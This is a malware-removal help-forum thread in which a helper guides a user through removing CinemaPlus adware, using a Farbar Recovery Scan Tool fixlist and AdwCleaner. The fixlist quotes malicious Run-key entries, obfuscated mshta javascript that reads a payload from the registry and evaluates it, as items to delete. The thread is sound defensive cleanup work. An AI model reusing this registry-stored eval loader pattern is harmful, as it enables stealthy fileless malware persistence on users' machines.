CinemaPlus-3.2cV07.07

Somehow a pesky Cinema Plus V07.07 found it’s way onto my computer, however when I try to uninstall it opens a window saying that I can uninstall and buy some other software, the “just uninstall” tiny text does nothing when I click on it. I’ve ran Grime Fighter and Clean up which has helped a lot but does not remove this programme. I tried uninstalling in Safe Mode and it did nothing - any pointers on how to remove this pesky programme would be much appreciated!

Many thanks
Rebecca

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.

https://dl.dropboxusercontent.com/u/73555776/frst.JPG

[*]It will produce a log called FRST.txt in the same directory the tool is run from.
[*]Please attach both logs generated.

Ok thanks - file attached

and Additional.txt

Hi this looks like something new, so when you have completed the fix could I have a fresh FRST scan please

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [gmsd_gb_005010023] => [X] HKLM-x32\...\Run: [**b5ece8a9<*>] => mshta javascript:Mml0EpM="a";w9N=new%20ActiveXObject("WScript.Shell");azsWhPH9c="GA";D2TB8V=w9N.RegRead("HKLM\\software\\Wow6432Node\\817f9077\\9364e27d");FVT2p8EbN="6SEkU";eval(D2TB8V);eVBVxi05w="189 (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM-x32\...\Run: [gmsd_gb_002030026] => [X] HKU\S-1-5-18\...\Run: [**b5ece8a9<*>] => mshta javascript:UOTG80XHy="A";o8j=new%20ActiveXObject("WScript.Shell");BR3ISZB4="Wx2yMPvE";rbJM9=o8j.RegRead("HKCU\\software\\817f9077\\9364e27d");lv6ddkj="8IUKMkeA";eval(rbJM9);uEFdzI8="inNiyXLQr"; <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-2193330594-1523224260-2583000878-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=55&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&SSPV= SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir= SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir= SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=58&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&q={searchTerms}&SSPV= SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir= Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File S4 zejytose; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\jnsh73EE.tmp [199168 2015-07-10] () [File not signed] S4 nosepoze; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\knsc563B.tmpfs [X] R1 {699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64; C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys [48784 2015-07-12] (StdLib) S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X] 2015-07-13 13:35 - 2015-07-13 13:35 - 00002476 _____ C:\Users\magicbrew\Desktop\Reimage2.lnk 2015-07-13 13:10 - 2015-07-12 22:00 - 00048784 _____ (StdLib) C:\Windows\system32\Drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys 2015-07-13 09:41 - 2015-07-13 09:52 - 00089365 _____ C:\ProgramData\L3553OBf.dat 2015-07-10 16:42 - 2015-07-13 13:02 - 00000000 ____D C:\Program Files (x86)\gmsd_gb_002030026 2015-07-10 16:42 - 2015-07-10 16:42 - 00003118 _____ C:\Windows\System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} 2015-07-10 10:26 - 2015-07-13 09:41 - 00000000 ____D C:\ProgramData\abc 2015-07-07 17:35 - 2015-07-13 12:35 - 00000000 ____D C:\Program Files (x86)\CinemaPlus-3.2cV07.07 2015-07-07 17:35 - 2015-07-13 09:44 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Users\magicbrew\AppData\Local\globalUpdate 2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\globalUpdate 2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\c715af32-1dba-4665-97b0-d821aa5cac1c 2015-07-07 17:34 - 2015-07-13 12:34 - 00000000 ____D C:\Program Files (x86)\Coupoon 2015-07-07 17:34 - 2015-07-07 17:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\Crossbrowse 2015-07-07 17:33 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\SmartWeb 2015-07-07 17:29 - 2015-07-07 17:29 - 00000000 ____D C:\Users\magicbrew\Documents\Any Video Converter 2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\Anvsoft 2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Program Files (x86)\Anvsoft 2015-07-07 17:28 - 2015-07-07 17:28 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\OpenCandy 2015-07-07 17:20 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58 2015-07-07 16:42 - 2015-07-07 16:42 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A} 2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieUserList 2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieSiteList 2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieBrowserModeList 2014-12-02 12:21 - 2014-12-02 12:21 - 0000037 ___SH () C:\Users\magicbrew\AppData\Roaming\3491672254e498b9d1dc6f1.41918858 2015-07-13 09:41 - 2015-07-13 09:52 - 0089365 _____ () C:\ProgramData\L3553OBf.dat Task: {15011F61-317C-4C6E-B9CC-BE3D69FC7EF6} - \0be795aa-89f8-4c7a-9398-1041b523595d-7 No Task File <==== ATTENTION Task: {1BD5DD3B-034C-404D-A865-43F5A9A3D8A4} - System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} => pcalua.exe -a C:\PROGRA~2\SearchProtect\Main\bin\uninstall.exe -c /S <==== ATTENTION Task: {1C675159-F615-4178-BDA2-661B02F80695} - \0be795aa-89f8-4c7a-9398-1041b523595d-10_user No Task File <==== ATTENTION Task: {3698927B-EA05-4575-B552-EB753A7B98DF} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-6 No Task File <==== ATTENTION Task: {3D338D15-AA7D-44DD-9AA0-372968117ACD} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-7 No Task File <==== ATTENTION Task: {3DB89CD6-34E7-41C7-8229-546728E14DB5} - \CreateChoiceProcessTask No Task File <==== ATTENTION Task: {42D26C8B-DD80-462E-98D8-DA6D742BC71E} - \0be795aa-89f8-4c7a-9398-1041b523595d-3 No Task File <==== ATTENTION Task: {9F0B38CD-7EBC-4491-9456-2FC16171043E} - \0be795aa-89f8-4c7a-9398-1041b523595d-5 No Task File <==== ATTENTION Task: {A02824C8-9D89-4F64-92EF-547A9C0616DC} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe <==== ATTENTION Task: {A6AF9D85-7F9A-476D-95F0-49FC3D51711D} - \0be795aa-89f8-4c7a-9398-1041b523595d-5_user No Task File <==== ATTENTION Task: {E6C0A9FE-C0BF-4860-A45E-1701C67BC76B} - \PC SpeedUp Service Deactivator No Task File <==== ATTENTION Task: {F0E841B2-7008-49CC-B4ED-BE8F5F76A920} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe <==== ATTENTION Task: {F1D93A0E-ED45-4FF7-8D26-42E20408A045} - \0be795aa-89f8-4c7a-9398-1041b523595d-6 No Task File <==== ATTENTION Task: {FAC3FEDE-18BE-498C-B23D-0E6CD1ADF476} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION AlternateDataStreams: C:\ProgramData\Microsoft:QcOdGCxHYBG4TkN7XblHwOl03ccj AlternateDataStreams: C:\ProgramData\Microsoft:tXBgMqmC0uFWziwQrJ5GM6A7Ouis AlternateDataStreams: C:\ProgramData\PACE:769ABF6D611ED68D AlternateDataStreams: C:\Users\magicbrew\Cookies:gv1yIDMJyN4dl5RY AlternateDataStreams: C:\Users\magicbrew\Cookies:L0LGLDSGlbNUjxSPWvA8KYn9jt AlternateDataStreams: C:\Users\magicbrew\Local Settings:89R4kgQyaYq1FGiXD11mik09mhPH AlternateDataStreams: C:\Users\magicbrew\Local Settings:koYwWWdpxBgTg4rs8KPLh AlternateDataStreams: C:\Users\magicbrew\AppData\Local:89R4kgQyaYq1FGiXD11mik09mhPH AlternateDataStreams: C:\Users\magicbrew\AppData\Local:koYwWWdpxBgTg4rs8KPLh AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:89R4kgQyaYq1FGiXD11mik09mhPH AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:koYwWWdpxBgTg4rs8KPLh AlternateDataStreams: C:\Users\magicbrew\AppData\Local\hPkIakbtz61q:Zk0qrQeyENrPfsOIfIT1vtF AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temp:W7sJktx3CgzjNuxON43o9 AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:gI0Cm4QLLW8Ky07opwOnfQ AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:z6zlAqiYS6ilphADGZa C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please download AdwCleaner by Xplode onto your desktop.

[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.

I think that’s done the trick - the programme has gone! Thank you so much!!

OK I would like to look at the registry keys referenced to ensure that they are safe for me to remove

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: Reg: reg query "HKCU\software\817f9077" Reg: reg query "HKLM\software\Wow6432Node\817f9077"

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that